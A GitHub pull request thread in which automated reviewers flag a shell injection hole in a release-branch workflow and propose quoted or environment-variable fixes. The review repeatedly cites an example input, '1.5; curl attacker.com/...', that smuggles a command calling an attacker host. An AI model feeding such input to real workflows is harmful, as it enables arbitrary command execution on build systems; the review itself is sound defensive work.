Chore/two digit branches

[tutte]

This PR will:

• Add support for 2-digit branches, executing the make update_all with an extra .0 if not provided

[gitar-bot]

Code Review ⚠️ Changes requested 0 resolved / 1 findings

Adds support for 2-digit branch name input but introduces a shell injection vulnerability through an unquoted workflow input on line 26 that could allow arbitrary command execution.

⚠️ Security: Unquoted workflow input enables shell injection

📄 .github/workflows/git-create-release-branch.yml:26

On line 26, ${{ inputs.release_branch_name }} is interpolated directly into the run: shell script without quotes. A malicious or accidental input value containing shell metacharacters (e.g., 1.5; curl attacker.com/...) would be executed as arbitrary commands. While this is a workflow_dispatch input (manually triggered), it's still a recognized GitHub Actions script injection pattern (see GitHub's security hardening guide).

The same unquoted expansion also means inputs with spaces or glob characters would cause unexpected behavior.

Suggested fix

Quote the interpolation:

        RELEASE_VERSION="${{ inputs.release_branch_name }}"

Alternatively, pass the input via an environment variable to fully avoid injection:

    - name: Update application versions
      env:
        RELEASE_VERSION: ${{ inputs.release_branch_name }}
      run: |
        if [[ $RELEASE_VERSION =~ ^[0-9]+\.[0-9]+$ ]]; then
          RELEASE_VERSION="${RELEASE_VERSION}.0"
          echo "... appending .0: $RELEASE_VERSION"
        fi
        make update_all RELEASE_VERSION="$RELEASE_VERSION"

🤖 Prompt for agents

Code Review: Adds support for 2-digit branch name input but introduces a shell injection vulnerability through an unquoted workflow input on line 26 that could allow arbitrary command execution.

1. ⚠️ Security: Unquoted workflow input enables shell injection
   Files: .github/workflows/git-create-release-branch.yml:26

   On line 26, `${{ inputs.release_branch_name }}` is interpolated directly into the `run:` shell script without quotes. A malicious or accidental input value containing shell metacharacters (e.g., `1.5; curl attacker.com/...`) would be executed as arbitrary commands. While this is a `workflow_dispatch` input (manually triggered), it's still a recognized GitHub Actions script injection pattern (see GitHub's security hardening guide).
   
   The same unquoted expansion also means inputs with spaces or glob characters would cause unexpected behavior.

   Suggested fix:
   Quote the interpolation:
   
           RELEASE_VERSION="${{ inputs.release_branch_name }}"
   
   Alternatively, pass the input via an environment variable to fully avoid injection:
   
       - name: Update application versions
         env:
           RELEASE_VERSION: ${{ inputs.release_branch_name }}
         run: |
           if [[ $RELEASE_VERSION =~ ^[0-9]+\.[0-9]+$ ]]; then
             RELEASE_VERSION="${RELEASE_VERSION}.0"
             echo "... appending .0: $RELEASE_VERSION"
           fi
           make update_all RELEASE_VERSION="$RELEASE_VERSION"

Options

Auto-apply is off → Gitar will not commit updates to this branch.
Display: compact → Showing less information.

Comment with these commands to change:

Auto-apply	Compact
gitar auto-apply:on	gitar display:verbose

_{Was this helpful? React with 👍 / 👎 | Gitar}

[gitar-bot]

⚠️ Security: Unquoted workflow input enables shell injection

On line 26, ${{ inputs.release_branch_name }} is interpolated directly into the run: shell script without quotes. A malicious or accidental input value containing shell metacharacters (e.g., 1.5; curl attacker.com/...) would be executed as arbitrary commands. While this is a workflow_dispatch input (manually triggered), it's still a recognized GitHub Actions script injection pattern (see GitHub's security hardening guide).

The same unquoted expansion also means inputs with spaces or glob characters would cause unexpected behavior.

Suggested fix:

Quote the interpolation:

        RELEASE_VERSION="${{ inputs.release_branch_name }}"

Alternatively, pass the input via an environment variable to fully avoid injection:

    - name: Update application versions
      env:
        RELEASE_VERSION: ${{ inputs.release_branch_name }}
      run: |
        if [[ $RELEASE_VERSION =~ ^[0-9]+\.[0-9]+$ ]]; then
          RELEASE_VERSION="${RELEASE_VERSION}.0"
          echo "... appending .0: $RELEASE_VERSION"
        fi
        make update_all RELEASE_VERSION="$RELEASE_VERSION"

_{Was this helpful? React with 👍 / 👎 | Reply gitar fix to apply this suggestion}

[Copilot]

Pull request overview

Adds logic to the release-branch creation GitHub Actions workflow so that when a release branch name is provided as a 2-part version (X.Y), the version passed to make update_all is normalized to X.Y.0.

Changes:

• Detect X.Y release versions and append .0 before running make update_all.
• Add a log line to make the normalization explicit in workflow output.

[Copilot]

The workflow input is interpolated into a bash assignment unquoted (RELEASE_VERSION=${{ inputs.release_branch_name }}), which allows shell metacharacters in release_branch_name to alter the script (command injection / unexpected parsing). Pass the input via env: (or otherwise safely quote/escape it) and ensure all later expansions (including the make invocation) are quoted to avoid word-splitting or injection via $RELEASE_VERSION.